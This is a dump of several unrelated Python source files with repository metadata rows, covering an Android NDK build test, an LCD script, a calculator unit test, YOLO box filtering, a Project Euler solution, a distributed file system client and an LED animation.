# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Check for correct link order from ndk-build.
"""
import os
import subprocess
import sys
def run_test(ndk_path, abi, platform, linker, build_flags):
    """Checks that no wrap.sh script is installed for this configuration."""
    # ndk-build is a .cmd batch wrapper on Windows hosts.
    ndk_build = os.path.join(ndk_path, 'ndk-build')
    if sys.platform == 'win32':
        ndk_build += '.cmd'

    project_path = 'project'
    ndk_args = build_flags + [
        f'APP_ABI={abi}',
        f'APP_LD={linker.value}',
        f'APP_PLATFORM=android-{platform}',
    ]
    # Merge stderr into stdout so the whole build log is returned on failure.
    result = subprocess.run([ndk_build, '-C', project_path] + ndk_args,
                            stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    output = result.stdout.decode('utf-8')
    if result.returncode != 0:
        return False, output

    wrap_sh = os.path.join(project_path, 'libs', abi, 'wrap.sh')
    if os.path.exists(wrap_sh):
        return False, '{} should not exist'.format(wrap_sh)
    return True, ''
| UTF-8 | Python | false | false | 1,564 | py | 239 | test.py | 137 | 0.662404 | 0.654092 | 0 | 44 | 34.545455 | 77 |
smartaleciam/playcard | 6,459,630,846,683 | d2fee26460dd9185281bd3976bde2ebcb40f8afb | 7e6790a59b4cfe2d31c2c65dfc86202e5b634506 | /html/scripts/clear_lcd.py | e86397ff724a4e85381db0fc6f02a80b4b504881 | []
| no_license | https://github.com/smartaleciam/playcard | a35c2a4aeb03c39217433835bc66352e783c357d | 9abefe2652e4e8f99e28127e95d2cec12bedcf59 | refs/heads/main | 2023-06-12T19:18:41.352208 | 2021-06-27T10:43:43 | 2021-06-27T10:43:43 | 306,681,286 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python
import Adafruit_CharLCD as LCD
lcd = LCD.Adafruit_CharLCD(4, 24, 23, 17, 18, 22, 16, 2, 5)
lcd.clear()
lcd.set_backlight(0) | UTF-8 | Python | false | false | 147 | py | 41 | clear_lcd.py | 36 | 0.687075 | 0.578231 | 0 | 7 | 20.142857 | 59 |
graalumj/Github-Actions-CI | 14,164,802,158,806 | aa37017053442e9492f01b4cf3fee97664928179 | d8e533937f2064785ed751e0f4fad83f31ac34ef | /test.py | c9dcb44f4beeb1d09f91773c328180ac9a4b1ba1 | []
| no_license | https://github.com/graalumj/Github-Actions-CI | afe7d5a45e2894b09ac57924877c69268eea413b | 6cebe2e623ae9bb7368cd973000a906fade307fa | refs/heads/main | 2023-05-13T12:55:09.443632 | 2021-06-06T19:03:54 | 2021-06-06T19:03:54 | 374,434,876 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import unittest
import calculator
class TestCase(unittest.TestCase):
def test_add(self):
self.assertEqual(calculator.add(1, 2), 3)
def test_subtract(self):
self.assertEqual(calculator.subtract(1, 1), 0)
def test_mutliply(self):
self.assertEqual(calculator.multiply(2, 3), 6)
def test_divide(self):
self.assertEqual(calculator.divide(4, 2), 2)
if __name__ == '__main__':
unittest.main()
| UTF-8 | Python | false | false | 446 | py | 1 | test.py | 1 | 0.643498 | 0.616592 | 0 | 21 | 20.238095 | 54 |
divyanshrm/yolo_implementation | 867,583,440,827 | 9fc83af8264cb3fcac5ac51c6dfd9ef98ce0bb8e | 826e513fd09d88416cb554e3824b32238180e6d3 | /yolo_eval.py | 1c1633eaa66a871f1bf4d34e2dae971fa7c9c9f0 | [
"MIT"
]
| permissive | https://github.com/divyanshrm/yolo_implementation | 09f61a2ee366818da19aa640278295975cd2025a | bb94246972ef018289f8254b4abec5c53c1413ce | refs/heads/master | 2020-12-28T10:41:15.518611 | 2020-04-14T01:32:33 | 2020-04-14T01:32:33 | 238,294,627 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | def yolo_eval(yolo_outputs, image_shape = (720., 1280.), max_boxes=10, score_threshold=.6, iou_threshold=.5):
Converts the output of YOLO encoding (a lot of boxes) to predicted boxes along with their scores, box coordinates and classes.
box_confidence, box_xy, box_wh, box_class_probs = yolo_outputs
boxes = yolo_boxes_to_corners(box_xy, box_wh)
scores, boxes, classes = yolo_filter_boxes(box_confidence,boxes,box_class_probs,score_threshold)
boxes = scale_boxes(boxes, image_shape)
scores, boxes, classes = yolo_non_max_suppression(scores,boxes,classes,iou_threshold=iou_threshold)
return scores, boxes, classes | UTF-8 | Python | false | false | 720 | py | 5 | yolo_eval.py | 4 | 0.655556 | 0.640278 | 0 | 22 | 30.818182 | 130 |
tkoz0/problems-project-euler | 7,894,149,933,602 | 81563eb45a382d63c97a8ab028af980df85e8bdb | bd844f868da174a15a54751609847320919bc4f6 | /p027a.py | de8cdc573d667a289a67373f60fb557c55ef4136 | []
| no_license | https://github.com/tkoz0/problems-project-euler | f8fa2c846b3f2c9719742d71acd1e837b3486e07 | 93e0bc51276acdd7729a45a18c05fd3a6eb1f125 | refs/heads/master | 2023-06-07T00:12:10.435409 | 2023-05-28T02:38:33 | 2023-05-28T02:38:33 | 157,948,871 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import libtkoz as lib
arange = 999 # -999 to 999
brange = 1000 # -1000 to 1000
pseqlenparam = 100 # estimate for longer sequences to determine prime cache size
# quadratic function is x^2+ax+b
# computing next: f(x+1) - f(x) = (x^2+2x+1+ax+a+b) - (x^2+ax+b)
# = 2x+1+a --> use this as difference to compute next more efficiently
# generate a set of primes to quickly look up
# if x may go up to 100, 100^2+1000*100+1000 ~= 10^5 --> seems reasonable
# pick the largest term at x=100
ptablemax = max(pseqlenparam**2, pseqlenparam*arange, brange)
ptable = lib.list_primes2(ptablemax,return_set=True)
def prime(n):
global ptable
global ptablemax
return (n <= ptablemax and n in ptable) or lib.prime(n)
print(': listed', len(ptable), 'primes <=', ptablemax)
# f(x) = x^2 + ax + b
# f(0) = b --> b must be prime
# f(1) = 1 + a + b --> if b odd then a must be odd
# f(x+1) - f(x) = 2x + 1 + a --> a must be odd so the step size is even
if arange % 2 == 0: arange -= 1 # ensure it is odd
mostprimes = 0
amost, bmost = 0, 0
for b in range(3, brange+1, 2):
if not prime(b): continue
for a in range(-arange, arange+1, 2):
x = 1
f = 1 + a + b # f(1)
while prime(f):
f += 2 * x + 1 + a
x += 1
if x > mostprimes:
mostprimes = x
amost, bmost = a, b
print(': f(x) = x^2 +', a, '* x +', b, '-->', x, 'primes')
print(amost * bmost)
| UTF-8 | Python | false | false | 1,430 | py | 238 | p027a.py | 207 | 0.583217 | 0.525175 | 0 | 41 | 33.878049 | 80 |
gregmuellegger/django | 9,414,568,318,895 | 947c88e9281e1aeb14754b4b576743e655b61b8a | 7fc3cafe26dd5396dce8fe5ec341115ed9b27c25 | /tests/regressiontests/localflavor/tests.py | 856e518bed3a906105da5cc413258691e2eafa2a | [
"BSD-3-Clause"
]
| permissive | https://github.com/gregmuellegger/django | e3e2860ff4d51629ff2a44801f4611919fc5b2b5 | fa182e8ae82f33764d5e1f70bcd45899e1bf17e6 | refs/heads/master | 2021-01-16T20:01:13.750357 | 2012-06-12T10:30:52 | 2012-06-26T16:39:14 | 1,046,323 | 22 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from __future__ import absolute_import
from .ar.tests import ARLocalFlavorTests
from .at.tests import ATLocalFlavorTests
from .au.tests import AULocalflavorTests
from .be.tests import BELocalFlavorTests
from .br.tests import BRLocalFlavorTests
from .ca.tests import CALocalFlavorTests
from .ch.tests import CHLocalFlavorTests
from .cl.tests import CLLocalFlavorTests
from .cn.tests import CNLocalFlavorTests
from .co.tests import COLocalFlavorTests
from .cz.tests import CZLocalFlavorTests
from .de.tests import DELocalFlavorTests
from .ec.tests import ECLocalFlavorTests
from .es.tests import ESLocalFlavorTests
from .fi.tests import FILocalFlavorTests
from .fr.tests import FRLocalFlavorTests
from .gb.tests import GBLocalFlavorTests
from .generic.tests import GenericLocalFlavorTests
from .hk.tests import HKLocalFlavorTests
from .hr.tests import HRLocalFlavorTests
from .id.tests import IDLocalFlavorTests
from .ie.tests import IELocalFlavorTests
from .il.tests import ILLocalFlavorTests
from .in_.tests import INLocalFlavorTests
from .is_.tests import ISLocalFlavorTests
from .it.tests import ITLocalFlavorTests
from .jp.tests import JPLocalFlavorTests
from .kw.tests import KWLocalFlavorTests
from .mk.tests import MKLocalFlavorTests
from .mx.tests import MXLocalFlavorTests
from .nl.tests import NLLocalFlavorTests
from .pl.tests import PLLocalFlavorTests
from .pt.tests import PTLocalFlavorTests
from .py.tests import PYLocalFlavorTests
from .ro.tests import ROLocalFlavorTests
from .ru.tests import RULocalFlavorTests
from .se.tests import SELocalFlavorTests
from .si.tests import SILocalFlavorTests
from .sk.tests import SKLocalFlavorTests
from .tr.tests import TRLocalFlavorTests
from .us.tests import USLocalFlavorTests
from .uy.tests import UYLocalFlavorTests
from .za.tests import ZALocalFlavorTests
| UTF-8 | Python | false | false | 1,815 | py | 192 | tests.py | 148 | 0.85124 | 0.85124 | 0 | 45 | 39.333333 | 50 |
thierry-bm/portefeuille | 1,726,576,856,149 | 4e43f15b34f91de6c6f6343da8e9b56118e62e8d | 713b4bfda3f137a13c3a3da03b3d3cbfbb7cfbd4 | /main5.py | dd1d7b67965ffbfaa85325ace60de7fdaa7e6a83 | []
| no_license | https://github.com/thierry-bm/portefeuille | 3f55499d76f06e2e1532332b9472bea474d6f0c0 | dd1b47ebeb4441111dfbb1504939a91f530117ca | refs/heads/master | 2020-08-29T04:48:18.538536 | 2020-03-22T21:53:32 | 2020-03-22T21:53:32 | 217,932,748 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | """On veut étudier la façon de calibrer cett utilité.
"""
# %%
import utility as ut
import numpy as np
import matplotlib.pyplot as plt
#%%
u = ut.get_cvx_utility(3)
r = np.linspace(-5,5,100)
us = {}
for β in [1,2,3]:
u = ut.get_cvx_utility(β)
plt.plot(r,u(r).value)
plt.legend([1,2,3])
plt.grid()
plt.plot()
# %%
| UTF-8 | Python | false | false | 334 | py | 21 | main5.py | 10 | 0.613982 | 0.577508 | 0 | 24 | 12.708333 | 54 |
ShrutiAggarwal99/TaskMaster | 6,622,839,580,471 | ecf93f713d4622eab2027d7a2b4d73dec6737ef1 | d757765f5ae1ffe7182fabd8a4fce340b5c35def | /env/lib/python3.6/base64.py | f95164da006b89beeef0c2ff4b56d7f3b38e664d | []
| no_license | https://github.com/ShrutiAggarwal99/TaskMaster | de6c9073a0f6decc06d4e929a5e192f64b580430 | 8f64422752bcbf9670d0be291e22546ebead75d6 | refs/heads/master | 2021-07-13T05:30:13.166018 | 2021-03-01T05:35:50 | 2021-03-01T05:35:50 | 230,086,228 | 0 | 0 | null | false | 2021-03-20T02:30:02 | 2019-12-25T10:31:35 | 2021-03-01T05:35:52 | 2021-03-20T02:30:02 | 16,679 | 0 | 0 | 1 | HTML | false | false | /home/shruti/anaconda3/lib/python3.6/base64.py | UTF-8 | Python | true | false | 46 | py | 50 | base64.py | 43 | 0.826087 | 0.717391 | 0 | 1 | 46 | 46 |
yofn/pyacm | 6,571,299,998,018 | cee2a8aa9d7dc7c452b4225fbe3d428aa335493c | a4456d808b4c72574a11c88282920a917b076f5b | /bnu/2020p1/3D层级.py | 2f5c933bdcfe5da0c8ee0140cd17a216138d3032 | [
"Apache-2.0"
]
| permissive | https://github.com/yofn/pyacm | 635f3b17cc08d9e702b561f9582fec4d694458b1 | e573f8fdeea77513711f00c42f128795cbba65a6 | refs/heads/master | 2023-07-09T02:11:31.044020 | 2021-08-10T02:02:24 | 2021-08-10T02:02:24 | 270,663,600 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python3
# https://codeforces.com/problemset/problem/17/B
# 覆盖所有节点的最短路径?
# 图的表示: matrix, list
# https://www.geeksforgeeks.org/comparison-between-adjacency-list-and-adjacency-matrix-representation-of-graph/
# DFS的实现: stack(非递归); 递归
# https://likegeeks.com/depth-first-search-in-python/
# 到底是DSU更好还是DFS更好?
# https://codeforces.com/blog/entry/451
# 即不用DSU也不用DFS, 可以用最小生成树或贪心方法(取cost最小的parent)
def f(n,l):
pl = [None]*(n+1) #p[0] is not used!
for a,b,c in l:
if pl[b] is None:
pl[b] = []
pl[b].append(c)
cr = sum([p is None for p in pl])
if cr>2:
return -1
return sum([min(p) for p in pl if p is not None])
n = int(input()) #1000
input()
a = int(input())
l = [list(map(int,input().split())) for _ in range(a)]
print(f(n,l))
| UTF-8 | Python | false | false | 907 | py | 712 | 3D层级.py | 703 | 0.631117 | 0.613551 | 0 | 28 | 27.464286 | 111 |
maiyajj/AutoTest_script-Appium_Connect | 17,763,984,766,715 | bec5a0c844a3948568f6acd43d2f619791d7b012 | f925499f896b012624118cfafd02fef76ff5075a | /src/testcase/GN_APP/input_case/GN_APP_Input_Case.py | 889adfc932d3adae349c4bd6ce5e9400ae4095bf | [
"Apache-2.0"
]
| permissive | https://github.com/maiyajj/AutoTest_script-Appium_Connect | f7c06db1d2f58682d1a9d6f534f7dd5fb65d766d | f9c2c42c281a9e2f984acb4a72dda0694b053f22 | HEAD | 2019-07-26T01:39:48.413753 | 2018-04-11T02:11:38 | 2018-04-11T02:11:38 | 112,449,369 | 30 | 22 | null | null | null | null | null | null | null | null | null | null | null | null | null | # coding=utf-8
try:
from .GN_APP_Account_Settings import *
from .GN_APP_Device_Page import *
from .GN_APP_Feed_Back import *
from .GN_APP_Forget_Password import *
from .GN_APP_Login import *
from .GN_APP_Message_Classify import *
from .GN_APP_Register import *
from .GN_APP_Theme_Style import *
from .GN_APP_Using_Help import *
from .GN_APP_Version import *
except ImportError as e:
print(e)
| UTF-8 | Python | false | false | 436 | py | 188 | GN_APP_Input_Case.py | 181 | 0.665138 | 0.662844 | 0 | 14 | 30.142857 | 42 |
naivelamb/leetcode | 12,257,836,677,639 | 0f7ac036177658940e45f2d445259462c481def0 | 7426f3cde2c93d65ffa76c904ba477d26becef8d | /0338_CountingBits.py | 892148d178eee57967b45e6d2a589331e130085f | []
| no_license | https://github.com/naivelamb/leetcode | 5e8ac58f606e0419a10d8fd9c1f532b4f9814017 | bae36601c3ce67f2b4a91d331a2d70dca8a1ee92 | refs/heads/master | 2021-07-23T20:38:06.265839 | 2021-07-12T16:14:21 | 2021-07-12T16:14:21 | 166,906,784 | 20 | 6 | null | null | null | null | null | null | null | null | null | null | null | null | null | """
https://leetcode.com/problems/counting-bits/
DP
The results of [2**k, 2**(k+1) - 1] is a replication of [0, 2**(k-1)], add 1 to every element.
"""
class Solution:
def countBits(self, num: int) -> List[int]:
dp = [0] * (num+1)
i, base = 0, 1
while i + base <= num:
while i <= base and i + base <= num:
dp[i+base] = 1 + dp[i]
i += 1
i = 0
base *= 2
return dp
| UTF-8 | Python | false | false | 466 | py | 753 | 0338_CountingBits.py | 752 | 0.454936 | 0.420601 | 0 | 17 | 26.411765 | 94 |
WeglarzK/cdv | 18,734,647,366,394 | 93023a72fe9fcc5bcfcc3cfc517716adeb106dda | 21c7b9a44869446a05d8c320addb697968766130 | /Podstawy_Programowania/1_podstawy.py | 3b23f1ca78a73ae4c6aa01437a3bc1427c9ec221 | []
| no_license | https://github.com/WeglarzK/cdv | 62464c4019b6e31ba6b4b43ff8e4cdb5f11616d2 | 7087246dab7f82adb955e40d4b3a14eb53faf66d | refs/heads/master | 2021-05-17T23:34:35.282381 | 2020-05-24T13:15:09 | 2020-05-24T13:15:09 | 251,005,233 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | print("CDV11")
print(8)
#potęgowanie
#pow = 2**10
#print(pow)
#pobieranie danych z klawiatury
#name = input()
#print("Twoje imie: "+name)
#surname=input()
#print("Twoje imie: " + name + ", nazwisko: " + surname)
#length= len(surname)
#print(length)
#print(type(surname))
#print(type(length))
#length = str(length)
#print(type(length))
name1=input()
surname1=input()
age=input()
print("Twoje imie: " + name1 + "\nTwoje nazwisko: " + surname1 + "\nTwoj wiek: " + age +".") | UTF-8 | Python | false | false | 477 | py | 12 | 1_podstawy.py | 12 | 0.655462 | 0.634454 | 0 | 26 | 17.346154 | 92 |
andrewzz310/SUFS | 7,988,639,216,457 | 880cbba0f0acb0859359e3d07e690d9f8abc3982 | 6d2157cd45799fc890a15de91c96d787fc4d1343 | /Client/Client.py | 5a0f5b32045892bd37aac396f4c9b21391757c70 | []
| no_license | https://github.com/andrewzz310/SUFS | b5065c9cd28178fb2e4d1b3e175b7c77b05f0469 | 2468122627232facaf1d68541aa3d1760f1277e0 | refs/heads/master | 2021-04-29T18:44:50.865235 | 2018-07-11T05:58:15 | 2018-07-11T05:58:15 | 126,285,409 | 1 | 0 | null | true | 2018-03-22T05:41:52 | 2018-03-22T05:41:52 | 2018-03-16T05:51:40 | 2018-03-16T05:51:39 | 310 | 0 | 0 | 0 | null | false | null | import xmlrpclib
import os
import boto3
from modules import BlockDivider
class Client:
def __init__(self):
self.file_name = None
self.path = None
self.bucket_name = 'sufs-shieldsj'
#self.bucket_name = 'sufs-client'
self.RPC_NAMENODE_SERVER_URL = ''
self.rpc_namenode = None
self.alive = {}
self.REPLICATION = 3
def set_namenode(self, url):
self.RPC_NAMENODE_SERVER_URL = url
self.rpc_namenode = xmlrpclib.ServerProxy("http://" + str(self.RPC_NAMENODE_SERVER_URL) + ':8000')
def put_file_to_nn(self, path, bucket_name, file_name):
self.path = path
self.file_name = file_name
self.save_file_from_s3(bucket_name, self.file_name)
block_info = self.register_file_to_nn(self.path, self.file_name, os.path.getsize(self.file_name))
block_divider = BlockDivider.BlockDivider(64000000)
print('block info:', block_info)
# Split files
blocks = block_divider.split_file(path, self.file_name, '')
for block in block_info:
print("********next block********")
smalldivider = BlockDivider.BlockDivider(4000000)
smallblocks = smalldivider.split_file(path, block[0], '')
print ("********dividing into small chunks********")
for smallblock in smallblocks:
print 'Connected to Datanode ' + str(block[1]) + ' and ' + block[0] + " mini-block " + smallblock
rpc_datanode = xmlrpclib.ServerProxy(str(block[1]) + ':8888')
with open(smallblock, "rb") as handle:
obj = xmlrpclib.Binary(handle.read())
print(rpc_datanode.receiveBlock(block[0], obj))
# delete block file from local storage
print ("********removing small chunk********")
os.remove(smallblock)
print ("********removing parent chunk********")
os.remove(block[0])
# Remove original file
os.remove(file_name)
# Send each block to Datanode
def saveCode(self): #lol
block_info = []
file_name = "blah"
for block in block_info:
print 'Connected to Datanode ' + str(block[1]) + ' and ' + block[0]
rpc_datanode = xmlrpclib.ServerProxy(str(block[1]) + ':8888')
with open(block[0], "rb") as handle:
obj = xmlrpclib.Binary(handle.read())
print(rpc_datanode.receiveBlock(block[0], obj))
# delete block file from local storage
os.remove(block[0])
# delete original file from local storage
os.remove(file_name)
def save_file_from_s3(self, bucket_name, file_name):
s3 = boto3.client('s3')
response = s3.get_object(Bucket=bucket_name, Key=file_name)
temp_file = open(file_name, 'w+')
temp_file.write(response['Body'].read())
temp_file.close()
print 'File Name:', file_name, 'File Size:', os.path.getsize(file_name)
def show_all_s3_files(self):
s3 = boto3.resource('s3')
bucket = s3.Bucket(self.bucket_name)
result = list()
for obj in bucket.objects.all():
print(obj.key)
result.append(obj.key)
return result
def register_file_to_nn(self, path, file_name, file_size):
return self.rpc_namenode.putFile(path, file_name, file_size)
def delete_file(self, path, file_name):
datanode_list = self.rpc_namenode.deleteFile(path, file_name)
print('datanode_list: ')
print(datanode_list)
if not datanode_list: # check if datanode_list is empty
return 'Block does not exists...'
else:
print 'Deleting ' + path + file_name
self.remove_files_from_datanodes(datanode_list)
return 'Removed blocks!'
def remove_files_from_datanodes(self, dn_list):
# connect to each datanode and remove block
for block in dn_list:
for dn in dn_list[block]:
print('dn:', dn)
dn_rpc = xmlrpclib.ServerProxy(dn + ':8888')
dn_rpc.removeBlock(block)
print('Deleted Block ' + block + ' from ' + dn)
return True
def delete_dir(self, dir_path):
datanode_list = self.rpc_namenode.deletedir(dir_path)
print(datanode_list)
if not datanode_list:
return 'Block does not exists...'
else:
self.remove_files_from_datanodes(datanode_list)
return 'Removed blocks!'
def read_file(self, path, file_name):
dict = self.rpc_namenode.lsDataNode(path+file_name)
outputFile = open(file_name, 'ab+')
for blockID, listDN in sorted(dict.iteritems()):
# choose the 1st DataNode in listDN
dnIP = listDN[0]
# make the connect to this DataNode to read the block
dn_rpc = xmlrpclib.ServerProxy(dnIP + ':8888')
block_data = dn_rpc.giveBlock(blockID)
print('Block Data:', block_data)
# write to the file
outputFile.write(block_data.data)
outputFile.close()
return True
| UTF-8 | Python | false | false | 5,248 | py | 15 | Client.py | 13 | 0.569169 | 0.557355 | 0 | 160 | 31.8 | 113 |
weikent/Python | 4,552,665,364,381 | 122fd907a941382ac71ab9a42b694908170a841f | 771be28beb8846d25c4cc37fcd910c07e76d23b2 | /python/pythonFirstGame/Menu.py | 33e4e949a19092acf82ce071b5d8009994e48ab1 | []
| no_license | https://github.com/weikent/Python | f31628f017253d8fc65dac5df5df82649235199f | 08aaa744b242020dc3ad8856565ac909b601cd9c | refs/heads/master | 2021-06-11T23:38:52.213947 | 2017-08-01T05:59:01 | 2017-08-01T05:59:01 | 15,369,463 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #-*- coding: utf-8 -*-
import types
class Menu(object):
"""
"""
def __init__(self, menu):
"""
Arguments:
- `Menu`:
"""
self._menu = menu
def show(self):
"""
Arguments:
- `self`:
"""
flag = True
dictStr = self._menu
tempList = []
while flag:
i = 1
tem = ""
if len(tempList) == 0:
tem = dictStr.keys()
else:
strlist = "dictStr["
for string in tempList:
strlist += '"'+string+'"'+"]["
#exec("print %s" %strlist[:-1])
exec("a = type(%s) == types.DictType" % strlist[:-1])
if not(a):
# exec("for string in %s:print string;i+=1" %strlist[:-1])
flag = 0
break
else:
exec("tem = %s.keys()" % strlist[:-1])
# exec("""for i in %s:
# print i""" % strlist[:-1])
for strr in tem:
print str(i) + '.' + strr
i+=1
action = raw_input("please choose a action (1-%d)>>>" %(i-1))
if action <> "":
action = int(action)
else:
continue
if action in range(1,i) and tem[action - 1] == "Cancel":
tempList.pop()
elif action in range(1,i):
tempList.append(tem[action-1])
else:
print "unknown choose...."
# exec("magic = %s(player);magic.use(player)" % tempList[len(tempList) - 1])
print tempList[len(tempList) - 1]
return tempList[len(tempList) - 1]
| UTF-8 | Python | false | false | 1,805 | py | 94 | Menu.py | 71 | 0.380055 | 0.368975 | 0 | 73 | 23.726027 | 99 |
LukeMurphy/RPI | 5,712,306,532,626 | 180bf393edd78aadce3999c873a7109381724a83 | 30dd17ec43e4ce2cae87b1186d3b35736e2bab20 | /pieces/singletons/moving_bars.py | da1dd40601e658dfe0d0374fc9e2b76b086fe4fd | []
| no_license | https://github.com/LukeMurphy/RPI | de2329fa82a36fac953d832fbb9a77ea9eae75d5 | 78a6b0d34d2b3b65f9dd7a502f60d500c0c11b80 | refs/heads/py3.6 | 2023-08-30T22:57:33.303969 | 2021-10-15T19:01:38 | 2021-10-15T19:01:38 | 45,502,537 | 3 | 0 | null | false | 2020-03-31T13:11:08 | 2015-11-03T23:27:06 | 2020-03-31T13:00:33 | 2020-03-31T13:00:30 | 358,477 | 3 | 1 | 0 | Python | false | false | import math
import random
import threading
import time
from modules.configuration import bcolors
from modules import colorutils
from PIL import Image, ImageDraw, ImageEnhance, ImageFont, ImageOps
'''
fadeIn = Fader()
# fadeIn.blankImage = Image.new("RGBA", (height, width))
fadeIn.crossFade = Image.new("RGBA", (height, width))
fadeIn.image = gradientImage
fadeIn.xPos = xPos
fadeIn.yPos = yPos
fadeIn.height = gradientImage.height
fadeIn.width = gradientImage.width
config.fadeArray.append(fadeIn)
'''
class Fader:
def __init__(self):
self.doingRefresh = 0
self.doingRefreshCount = 50
self.fadingDone = False
def fadeIn(self, config):
if self.fadingDone == False:
if self.doingRefresh < self.doingRefreshCount:
self.blankImage = Image.new("RGBA", (self.width, self.height))
self.crossFade = Image.blend(
self.blankImage,
self.image,
self.doingRefresh / self.doingRefreshCount,
)
config.image.paste(
self.crossFade, (self.xPos, self.yPos), self.crossFade
)
self.doingRefresh += 1
else:
config.image.paste(self.image, (self.xPos, self.yPos), self.image)
self.fadingDone = True
class Bar:
def __init__(self):
self.remake()
def remake(self) :
self.xSpeed = random.uniform(config.xSpeedRangeMin * config.direction, config.xSpeedRangeMax * config.direction)
self.ySpeed = random.uniform(config.ySpeedRangeMin, config.ySpeedRangeMax)
self.yPos = round(random.uniform(config.yRangeMin,config.yRangeMax))
self.xPos = -config.barThicknessMax * 2
if config.direction == -1 :
self.xPos = config.canvasWidth + config.barThicknessMax * 2
self.barThickness = round(random.uniform(config.barThicknessMin, config.barThicknessMax))
#self.colorVal = colorutils.randomColorAlpha()
cset = config.colorSets[config.usingColorSet]
self.colorVal = colorutils.getRandomColorHSV(cset[0], cset[1], cset[2], cset[3], cset[4], cset[5], config.dropHueMax,0, config.colorAlpha, config.brightness )
self.outlineColorVal = colorutils.getRandomColorHSV(cset[0], cset[1], cset[2], cset[3], cset[4], cset[5], config.dropHueMax,0, config.outlineColorAlpha, config.brightness )
def transformImage(img):
width, height = img.size
new_width = 50
m = 0.0
img = img.transform(
(new_width, height), Image.AFFINE, (1, m, 0, 0, 1, 0), Image.BICUBIC
)
return img
def drawBar():
global config
def reDraw():
global config
def runWork():
global config
print(bcolors.OKGREEN + "** " + bcolors.BOLD)
print("Running moving_bars.py")
print(bcolors.ENDC)
while config.isRunning == True:
iterate()
time.sleep(config.redrawRate)
if config.standAlone == False :
config.callBack()
def iterate():
global config
for i in range(0, config.numberOfBars):
bar = config.barArray[i]
bar.xPos += bar.xSpeed
bar.yPos += bar.ySpeed
w = round(math.sqrt(2) * config.barThicknessMax * 1.5)
angle = 180/math.pi * math.tan(bar.ySpeed/abs(bar.xSpeed))
temp = Image.new("RGBA", (w, w))
drw = ImageDraw.Draw(temp)
if config.tipType == 1 :
drw.rectangle((0, 0, bar.barThickness * 2, bar.barThickness ), fill = bar.colorVal, outline = bar.outlineColorVal)
drw.rectangle((0, 2, bar.barThickness * 2, bar.barThickness+2 ), fill = bar.colorVal, outline = bar.outlineColorVal)
else :
drw.ellipse((0, 2, bar.barThickness, bar.barThickness+2 ), fill = bar.colorVal, outline = bar.outlineColorVal)
temp = temp.rotate(config.tipAngle - angle)
config.image.paste(temp,(round(bar.xPos), round(bar.yPos)), temp)
if bar.xPos > config.canvasWidth and config.direction == 1:
bar.remake()
if bar.xPos < 0 and config.direction == -1:
bar.remake()
if random.random() < .002 :
if config.dropHueMax == 0 :
config.dropHueMax = 255
else :
config.dropHueMax = 0
#print("Winter... " + str(config.dropHueMax ))
if random.random() < .003 :
config.usingColorSet = math.floor(random.uniform(0,config.numberOfColorSets))
# just in case ....
if config.usingColorSet == config.numberOfColorSets :
config.usingColorSet = config.numberOfColorSets-1
config.colorAlpha = round(random.uniform(config.leadEdgeAlpahMin,config.leadEdgeAlpahMax))
config.dropHueMax = 0
#config.tipType = round(random.random())
#print("ColorSet: " + str(config.usingColorSet))
config.render(config.image, 0,0)
def main(run=True):
global config
config.redrawRate = .02
config.image = Image.new("RGBA", (config.screenWidth, config.screenHeight))
config.draw = ImageDraw.Draw(config.image)
config.canvasImage = Image.new("RGBA", (config.canvasWidth, config.canvasHeight))
config.canvasDraw = ImageDraw.Draw(config.canvasImage)
config.xPos = 0
config.dropHueMax = 0
config.numberOfBars = int(workConfig.get("bars", "numberOfBars"))
config.barThicknessMin = int(workConfig.get("bars", "barThicknessMin"))
config.barThicknessMax = int(workConfig.get("bars", "barThicknessMax"))
config.direction = int(workConfig.get("bars", "direction"))
yRange = (workConfig.get("bars", "yRange")).split(",")
config.yRangeMin = int(yRange[0])
config.yRangeMax = int(yRange[1])
config.leadEdgeAlpahMin = int(workConfig.get("bars", "leadEdgeAlpahMin"))
config.leadEdgeAlpahMax = int(workConfig.get("bars", "leadEdgeAlpahMax"))
config.tipAngle = float(workConfig.get("bars", "tipAngle"))
config.xSpeedRangeMin = float(workConfig.get("bars", "xSpeedRangeMin"))
config.xSpeedRangeMax = float(workConfig.get("bars", "xSpeedRangeMax"))
config.ySpeedRangeMin = float(workConfig.get("bars", "ySpeedRangeMin"))
config.ySpeedRangeMax = float(workConfig.get("bars", "ySpeedRangeMax"))
config.tipType = 1
config.colorAlpha = round(random.uniform(config.leadEdgeAlpahMin,config.leadEdgeAlpahMax))
config.outlineColorAlpha = round(random.uniform(config.leadEdgeAlpahMin,config.leadEdgeAlpahMax))
yPos = 0
config.barArray = []
config.colorSets = []
config.colorSetList = list(
i for i in (workConfig.get("bars", "colorSets").split(","))
)
config.numberOfColorSets = len(config.colorSetList)
for setName in config.colorSetList :
cset = list(
float(i) for i in (workConfig.get("bars", setName).split(","))
)
config.colorSets.append(cset)
config.usingColorSet = math.floor(random.uniform(0,config.numberOfColorSets))
if config.usingColorSet == config.numberOfColorSets : config.usingColorSet = config.numberOfColorSets - 1
# initialize and place the first set
for i in range(0, config.numberOfBars):
bar = Bar()
bar.yPos = round(random.uniform(config.yRangeMin,config.yRangeMax))
bar.xPos = round(random.uniform(0,config.canvasWidth - config.barThicknessMax))
config.barArray.append(bar)
#yPos += bar.barThickness
if run:
runWork()
| UTF-8 | Python | false | false | 6,722 | py | 585 | moving_bars.py | 160 | 0.7169 | 0.705147 | 0 | 217 | 29.976959 | 174 |
Yiftah/Udacity | 4,501,125,759,636 | c4f29a8326da5d107d4cb880a8e8bb6c35dcdced | bcd40d3361c91b16bef69299d3701ab1ac7db169 | /entertainment_center.py | a477129c8de12b31417d7052d9e9f8340f53282e | []
